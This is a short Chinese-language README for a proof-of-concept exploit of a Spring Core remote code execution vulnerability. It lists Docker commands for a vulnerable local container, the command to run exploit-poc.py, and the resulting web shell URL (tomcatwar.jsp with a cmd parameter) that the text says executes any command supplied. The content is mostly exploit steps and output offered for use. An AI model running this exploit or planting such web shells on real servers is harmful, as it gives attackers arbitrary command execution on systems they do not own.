该漏洞影响 Spring Core,攻击者可以发送特制的 HTTP 请求,绕过库的 HTTP 请求解析器的保护,从而导致远程代码执行。
更多信息请访问 此处

要利用此漏洞,必须满足几个条件:
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
预期响应
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
如果你访问此 URL,它将执行你想要的任何命令 cmd=<whatyouwant>

如果你通过 SSH 进入容器,将看到已创建了一个新文件 tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT